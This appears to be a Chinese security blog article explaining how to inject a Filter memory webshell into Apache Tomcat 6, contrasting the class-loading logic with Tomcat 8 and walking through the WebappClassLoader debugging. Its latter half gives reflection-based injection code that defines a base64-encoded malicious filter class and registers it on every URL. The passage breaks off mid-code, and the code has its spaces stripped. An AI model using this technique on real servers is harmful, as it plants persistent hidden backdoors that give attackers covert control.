Java安全之Tomcat6Filter內(nèi)存馬問題

第Java安全之Tomcat6Filter內(nèi)存馬問題目錄回顧Tomcat8打法探索Tomcat6與Tomcat8之間的區(qū)別

回顧Tomcat8打法

先回顧下之前Tomcat789的打法

這里先拋開78之間的區(qū)別，在8中，最后add到filterchain的都是一個filterconfig對象

ApplicationFilterConfig包含了FilterDef對象

構(gòu)造方法如下，如果當前filter屬性為null會從FilterDef取filter的實例對象

ApplicationFilterConfig(Contextcontext,FilterDeffilterDef)throwsClassCastException,ClassNotFoundException,IllegalAccessException,InstantiationException,ServletException,InvocationTargetException,NamingException,IllegalArgumentException,NoSuchMethodException,SecurityException{

this.context=context;

this.filterDef=filterDef;

if(filterDef.getFilter()==null){

this.getFilter();

}else{

this.filter=filterDef.getFilter();

this.getInstanceManager().newInstance(this.filter);

this.initFilter();

}

FilterDef中存儲了filterClass/filterName/filter屬性

publicclassFilterDefimplementsSerializable{

privatestaticfinallongserialVersionUID=1L;

privatestaticfinalStringManagersm;

privateStringdescription=null;

privateStringdisplayName=null;

privatetransientFilterfilter=null;

privateStringfilterClass=null;

privateStringfilterName=null;

privateStringlargeIcon=null;

privatefinalMapString,Stringparameters=newHashMap();

privateStringsmallIcon=null;

privateStringasyncSupported=null;

publicFilterDef(){

}

再有就是createFilterChain中還涉及到filterMap

FilterMap里主要存放urlpatterner和filterName的映射

publicclassFilterMapextendsXmlEncodingBaseimplementsSerializable{

privatestaticfinallongserialVersionUID=1L;

publicstaticfinalintERROR=1;

publicstaticfinalintFORWARD=2;

publicstaticfinalintINCLUDE=4;

publicstaticfinalintREQUEST=8;

publicstaticfinalintASYNC=16;

privatestaticfinalintNOT_SET=0;

privateintdispatcherMapping=0;

privateStringfilterName=null;

privateString[]servletNames=newString[0];

privatebooleanmatchAllUrlPatterns=false;

privatebooleanmatchAllServletNames=false;

privateString[]urlPatterns=newString[0];

tomcat8下注入filter內(nèi)存馬流程如下：

FilterDef:設置setFilter(Filterfilter)setFilterName(StringfilterName)setFilterClass(StringfilterClass)這里filterName和filterClass應該不是一個東西,最后調(diào)用StandardContext#addFilterDef將該惡意filterdefput到this.filterDefsFilterMap:addURLPattern(/*)setFilterName(StringfilterName)setDispatcher(DispatcherType.REQUEST.name())，最后調(diào)用StandardContext#addFilterMapBefore(filtermap)添加到this.filterMaps中ApplicationFilterConfig:調(diào)用有參構(gòu)造將FilterDef作為參數(shù)傳遞進去后調(diào)有參構(gòu)造實例化一個ApplicationFilterConfig，最終put進standardcontext的屬性里去。

探索Tomcat6與Tomcat8之間的區(qū)別

主要看下tomcat6和tomcat8之間createFilterChain不相同的地方看到ApplicationFilterFactory#createFilterChain

跟進getFilter

主要代碼如下:

所以這里構(gòu)造filterDef的時候filterClass為evilfilter的全類名即可

再來看下FilterDef可以發(fā)現(xiàn)確實在Tomcat6下面沒有filter這個屬性了

所以一個很大的區(qū)別就是在getFilter方法，也就是獲取filter實例對象的邏輯：

Tomcat8中是通過filterDef的屬性filter值來拿到惡意filter實例

Tomcat6中是通過filterDef的屬性filterClass屬性作為類名，通過ClassLoader去實例化

這里當我們調(diào)用有參構(gòu)造實例化ApplicationFilterConfig時，會進入getFilter方法邏輯內(nèi)

重點看loadClass方法是否可以加載到我們的惡意filter，因為這個filter并不是真實存在，且我們也只是通過了當前線程去defineClass的

跟進WebappClassLoader#loadClass

看到this.findLoadedClass0(name)從resourceEntries也就是classes下各個包中的.class找，是否有這個類，有的話直接return這個entry的loadClass屬性

這個屬性存儲的是該類的class對象,如果這里面有該類名，后面就直接resovleClass了

這里肯定是沒有我們的惡意filter，繼續(xù)往下跟

后面直接調(diào)用java.lang.ClassLoader#findLoadedClass來通過ClassLoader去找是否已經(jīng)加載過該class了

而在這里是直接找到了

查閱開發(fā)資料并思考了一下：

這里因為我們之前是通過當前線程上下文加載器把惡意filter給loadClass了,所以這里就是可以找到的

后面隨手翻了下classloader的屬性,發(fā)現(xiàn)在classes屬性是存在該filter的class的

那么正好來debug一下當前線程上下文ClassLoader#loadClass的過程

可以看到當前上下文的ClassLoader就是WebappClassLoader,并且此時classes屬性里并沒有我們的惡意類

而當步過defineClass后，當前線程上下文ClassLoader也就是WebappClassLoader的classes屬性中就新增了我們的惡意filter的class

所以后續(xù)在getFilter的邏輯中也是可以成功通過

回溯上面的邏輯時，getFilter方法因為會走到這個else邏輯內(nèi)，所以最終也是通過WebappClassLoader#loadClass的我們的惡意filter

以上，所以因為我們前面調(diào)用的是Thread.currentThread().getContextClassLoader()去加載的我們惡意filter類，而tomcat6中getFilter邏輯是通過this.context.getLoader().getClassLoader();去findClass，而這兩個ClassLoader又同為WebappClassLoader所以不會存在ClassNotfound的問題。所以tomcat6中注入filter內(nèi)存馬就不需要先實例化惡意filter存到filterDef中，直接使用Thread.currentThread().getContextClassLoader()去defineClass一下惡意filter即可。

注入內(nèi)存馬的主要代碼如下：

Methodvar1=ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,Integer.TYPE,Integer.TYPE);

var1.setAccessible(true);

byte[]var2=base64decode("base64str");

var1.invoke(Thread.currentThread().getContextClassLoader(),var2,0,var2.length);

try{

if(STANDARDCONTET!=null){

//1反射獲取filterDef

ClassFilterDefClass=Class.forName("org.apache.catalina.deploy.FilterDef");

ConstructorFilterDefconstructor=FilterDefClass.getConstructor(newClass[]{});

ObjectfilterDef=FilterDefconstructor.newInstance();

//2設置filtername

MethodsetFilterNameMethod=FilterDefClass.getDeclaredMethod("setFilterName",String.class);

setFilterNameMethod.invoke(filterDef,filterName);

//3setFilterClass

MethodsetFilterClassMethod=FilterDefClass.getDeclaredMethod("setFilterClass",String.class);

setFilterClassMethod.invoke(filterDef,Thread.currentThread().getContextClassLoader().loadClass("HiganbanaFilter").getName());

//4addFilterDef

MethodaddFilterDef=STANDARDCONTET.getClass().getMethod("addFilterDef",FilterDefClass);

addFilterDef.invoke(STANDARDCONTET,filterDef);

//構(gòu)造FilterMap

ClassFilterMapClass=Class.forName("org.apache.catalina.deploy.FilterMap");

ObjectfilterMap=FilterMapClass.newInstance();

MethodsetFilterNameMethod2=FilterMapClass.getDeclaredMethod("setFilterName",String.class);

setFilterNameMethod2.invoke(filterMap,FilterDefClass.getDeclaredMethod("getFilterName").invoke(filterDef));

MethodsetDispatcherMethod=FilterMapClass.getDeclaredMethod("setDispatcher",String.class);

setDispatcherMethod.invoke(filterMap,"REQUEST");

MethodaddURLPatternMethod=FilterMapClass.getDeclaredMethod("addURLPattern",String.class);

addURLPatternMethod.invoke(filterMap,"/*");

MethodaddFilterMapMethod=STANDARDCONTET.getClass().getDeclaredMethod("addFilterMap",FilterMapClass);

addFilterMapMethod.invoke(STANDARDCONTET,filterMap);

//創(chuàng)建filterconfig并添加到standardcontext.filterconfigs數(shù)組里